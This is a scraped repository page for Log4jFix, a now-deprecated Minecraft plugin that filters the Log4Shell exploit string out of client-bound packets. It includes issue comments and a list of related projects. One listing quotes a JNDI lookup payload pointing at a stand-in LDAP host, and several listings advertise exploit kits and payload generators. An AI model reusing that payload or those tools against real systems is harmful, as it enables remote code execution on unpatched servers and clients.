Prevents the log4j exploit from being sent to Minecraft clients.

Overview

⚠️ DEPRECATION ⚠️

Mojang has now released client updates, making this plugin obsolete. Make sure to fully restart your client. If you haven't already, update your backend servers -- only updating your server jars will fix the exploit. Join the Paper Discord and read the pins in #paper-help.

Log4jFix

Prevents the log4j exploit from reaching connected Minecraft clients.

Building it yourself

Inside the log4jfix-velocity/ folder, create a subfolder called libs. Download and place the velocity-proxy jar in that folder and modify log4jfix-velocity/build.gradle.kts accordingly.

You might also like...

CVE-2021-44228 (Apache Log4j Remote Code Execution)

CVE-2021-44228 (Apache Log4j Remote Code Execution) all log4j-core versions >=2.0-beta9 and <=2.14.1 The version of 1.x has other vulnerabilities, it

Apr 23, 2022

Burp Active Scan extension to identify Log4j vulnerabilities CVE-2021-44228 and CVE-2021-45046

Log4j-HammerTime This Burp Suite Active Scanner extension validates exploitation of the Apache Log4j CVE-2021-44228 and CVE-2021-45046 vulnerabilities

Jan 8, 2022

A simple HWID authentication system for your minecraft mod.

HWID-Authentication-System A simple HWID authentication system for your minecraft mod. This is a simple mod which can prevent unwanted users from runn

Dec 10, 2022

This is plugin for 1.17 Spigot/Bukkit Minecraft's servers.

This is plugin for 1.17 Spigot/Bukkit Minecraft's servers. This plugin fixes BowExploit(BowBomb) that found recently. Meteor Client developers released their fix, but the problem is that it fixes vanilla arrow mechanics. Together I with https://github.com/l1tecorejz we made a plugin that fixes the exploit and doesn't

Jan 3, 2023

A injection client for Minecraft 1.8.9forge,forked and optimize on VapuLite

May 8, 2022

A singular file to protect as many Minecraft servers and clients as possible from the Log4j exploit (CVE-2021-44228).

MC-Log4J-Patcher The goal of this project is to provide Minecraft players, and server owners, peace of mind in regards to the recently discovered Log4

Jan 4, 2022

Fixes Minecraft client lag from receiving chat messages, at the expense of not being able to block players in chat.

chat-lag-fix Fixes Minecraft client lag from receiving chat messages, at the expense of not being able to block players in chat. Mojang in their infin

Dec 4, 2022

Apache Log4j 2 is an upgrade to Log4j that provides significant improvements over its predecessor, Log4j 1.x, and provides many of the improvements available in Logback while fixing some inherent problems in Logback's architecture.

Apache Log4j 2 Apache Log4j 2 is an upgrade to Log4j that provides significant improvements over its predecessor, Log4j 1.x, and provides many of the

Jan 4, 2023

A plugin that allows server owners to override sent biome to clients.

BiomeVisuals BiomeVisuals allows you to override biome data before it is sent to the client, allowing you to display special effects. Documentation In

Dec 22, 2022

LecternCrashFix - Fixes the lectern crash/exploit.

LecternCrashFix This fixes the new lectern crash/exploit. This bug is fixed on Paper build 276 and above. This is also fixed on CraftBukkit. Make sure

Jun 5, 2022

JNDI-Exploit is an exploit on Java Naming and Directory Interface (JNDI) from the deleted project from the user feihong on GitHub.

JNDI-Exploit JNDI-Exploit is a fork from the deleted project from the user feihong-cs on GitHub. To learn more about JNDI and what you can do with thi

Dec 6, 2022

LOG4J Java exploit - WAF and patches bypass tricks

Jan 7, 2023

A simple minecraft mod for 1.12.2 which logs sent and received packets.

Packet-Logger A simple minecraft mod for 1.12.2 which logs sent and received packets. Usage You must have Forge 1.12.2 installed. Download the jar fro

Dec 2, 2022

Two Spring-boot applications registering themselves to an spring-boot-admin-server application as separate clients for the purpose of monitoring and managing the clients

Spring-boot-admin implementation with 1 Server and 2 clients Creating a Server application to monitor and manage Spring boot applications (clients) un

Dec 6, 2022

log4j-scanner is a project derived from other members of the open-source community by CISA's Rapid Action Force team to help organizations identify potentially vulnerable web services affected by the log4j vulnerabilities.

Log4j Scanner This repository provides a scanning solution for the log4j Remote Code Execution vulnerabilities (CVE-2021-44228 & CVE-2021-45046). The

Dec 22, 2022

Oxygen-log4j-patcher - A tool that upgrades the log4j from an Oxygen installation to version 2.16

Oxygen XML Patch Tool for Apache Log4j vulnerability CVE-2021-44228, CVE-2021-45046 and CVE-2021-45105 This is a tool that updates the log4j version 2

Jan 10, 2022

Log4j-payload-generator - Log4j jndi injects the Payload generator

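0x01 Introduction log4j-payload-generator is a plugin for the woodpecker framework that generates payloads for the log4j JNDI injection vulnerability. It can currently generate the following 5 types of payload with one click. Original payload {[upper|lower]:x}-type randomly mixed payload {[upper|lower]:x}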

Dec 30, 2022
Comments
  • Filter contents of all types of components sent by plugins

    This properly filters the string out of all possible contents of a chat packet (Spigot's Bungee components and adventure components) instead of just Vanilla component ones. It also filters the full JSON too (as there might be cases where plain text does not match up with what is logged).

    And yes, I realise that all clients should be fixed and it's basically their issue but the false sense of security the plugin provides right now warrants a PR of this imo.

    Could the code be prettier? Probably. Does it work anyways? Yes.

    opened by Phoenix616 6
  • Unhandled exception in onPacketSending(PacketEvent)

    Well, I appreciate your hard work.

    Your patch fixes a few exploits that can be abused so easily in chat.

    You have done a great job patching the exploit at the application level.

    At least it's a very useful temporary patch during the first few hours of the chaos.

    Just before making it an obsolete project, maybe can you address the following errors?

    [Log4jFix] Unhandled exception number 16384 occured in onPacketSending(PacketEvent) for Log4jFix
    java.lang.NoClassDefFoundError: net/kyori/adventure/text/Component
        at dev.frankheijden.log4jfix.bukkit.Log4jFixBukkit$1.onPacketSending(Log4jFixBukkit.java:28) ~[?:?]
        at com.comphenix.protocol.injector.SortedPacketListenerList.invokeSendingListener(SortedPacketListenerList.java:195) ~[?:?]
        at com.comphenix.protocol.injector.SortedPacketListenerList.invokePacketSending(SortedPacketListenerList.java:149) ~[?:?]
        at com.comphenix.protocol.injector.PacketFilterManager.handlePacket(PacketFilterManager.java:535) ~[?:?]
        at com.comphenix.protocol.injector.PacketFilterManager.invokePacketSending(PacketFilterManager.java:516) ~[?:?]
        at com.comphenix.protocol.injector.netty.ProtocolInjector.packetQueued(ProtocolInjector.java:346) ~[?:?]
        at com.comphenix.protocol.injector.netty.ProtocolInjector.onPacketSending(ProtocolInjector.java:308) ~[?:?]
        at com.comphenix.protocol.injector.netty.ChannelInjector.processSending(ChannelInjector.java:433) ~[?:?]
        at com.comphenix.protocol.injector.netty.ChannelInjector.access$800(ChannelInjector.java:70) ~[?:?]
        at com.comphenix.protocol.injector.netty.ChannelInjector$3.handleScheduled(ChannelInjector.java:373) ~[?:?]
        at com.comphenix.protocol.injector.netty.ChannelInjector$3.onMessageScheduled(ChannelInjector.java:343) ~[?:?]
        at com.comphenix.protocol.injector.netty.ChannelProxy$2.schedulingRunnable(ChannelProxy.java:127) ~[?:?]
        at com.comphenix.protocol.injector.netty.EventLoopProxy.execute(EventLoopProxy.java:95) ~[?:?]
        at net.minecraft.server.v1_8_R3.NetworkManager.a(NetworkManager.java:192) ~[server.jar:git-Spigot-21fe707-741a1bd]
        at net.minecraft.server.v1_8_R3.NetworkManager.handle(NetworkManager.java:141) ~[server.jar:git-Spigot-21fe707-741a1bd]
        at net.minecraft.server.v1_8_R3.PlayerConnection.sendPacket(PlayerConnection.java:907) ~[server.jar:git-Spigot-21fe707-741a1bd]
        at org.bukkit.craftbukkit.v1_8_R3.entity.CraftPlayer.sendRawMessage(CraftPlayer.java:146) ~[server.jar:git-Spigot-21fe707-741a1bd]
        at org.bukkit.craftbukkit.v1_8_R3.entity.CraftPlayer.sendMessage(CraftPlayer.java:153) ~[server.jar:git-Spigot-21fe707-741a1bd]
        at fr.xephi.authme.process.login.AsynchronousLogin.displayOtherAccounts(AsynchronousLogin.java:307) ~[?:?]
        at fr.xephi.authme.process.login.AsynchronousLogin.performLogin(AsynchronousLogin.java:252) ~[?:?]
        at fr.xephi.authme.process.login.AsynchronousLogin.login(AsynchronousLogin.java:101) ~[?:?]
        at fr.xephi.authme.process.Management.lambda$performLogin$0(Management.java:53) ~[?:?]
        at org.bukkit.craftbukkit.v1_8_R3.scheduler.CraftTask.run(CraftTask.java:71) [server.jar:git-Spigot-21fe707-741a1bd]
        at org.bukkit.craftbukkit.v1_8_R3.scheduler.CraftAsyncTask.run(CraftAsyncTask.java:53) [server.jar:git-Spigot-21fe707-741a1bd]
        at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149) [?:1.8.0_282]
        at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624) [?:1.8.0_282]
        at java.lang.Thread.run(Thread.java:748) [?:1.8.0_282]

    This error only happens in the latest version, which is 1.0.4. I don't have these in 1.0.1.

    Again, thanks for your hard work.

    FYI, I was using ProtocolLib 4.7.0 and ViaVersion 4.1.1. Spigot 1.8.8 (with the RCE exploit patched)

    opened by mokdennie26 1
Releases(v1.0.5)
Owner
Frank van der Heijden
📚 Student at Delft University of Technology, BSc Computer Science and Engineering | Discord: FrankHeijden#0099
Removal of JndiLookup in now obsolete Minecraft versions, or versions that still have log4j < 2.10 and is unable to use

NukeJndiLookupFromLog4j Removal of JndiLookup in now obsolete Minecraft versions, or versions that still have log4j < 2.10 and is unable to use -Dlog4

THONK Monarchy 11 Dec 15, 2022
Log4Shell RCE exploit using a gadget class. Not dependent on an old JDK version to work.

null 8 Jan 4, 2022
An LDAP RCE exploit for CVE-2021-44228 Log4Shell

log4j-poc An LDAP RCE exploit for CVE-2021-44228 Log4Shell Description The demo Tomcat 8 server on port 8080 has a vulnerable app (log4shell) deployed

null 60 Dec 10, 2022
Log4Shell Zero-Day Exploit Proof of Concept

Log4Shell Zero-Day Exploit if attacker manage to log this string ${jndi:ldap://someaddresshere/param1=value1} to log4j it somehow loads the class/java

o7 19 Oct 9, 2022
Writeup and exploit for installed app to system privilege escalation on Android 12 Beta through CVE-2021-0928

Writeup and exploit for installed app to system privilege escalation on Android 12 Beta through CVE-2021-0928, a `writeToParcel`/`createFromParcel` serialization mismatch in `OutputConfiguration`

null 52 Dec 30, 2022
JNDI-Exploit-Kit

JNDI-Exploit-Kit Disclaimer This is a forked modified version of the great exploitation tool created by @welk1n

puckie 20 Dec 7, 2022
log4j2 remote code execution or IP leakage exploit (with examples)

log4j2-exploits 2021-12-11.12-17-44.mp4 This fundamental vulnerability was reported by CVE-2018-3149 and patched by this article. (8u121 Release Notes

ilsubyeega-desu 70 Sep 7, 2022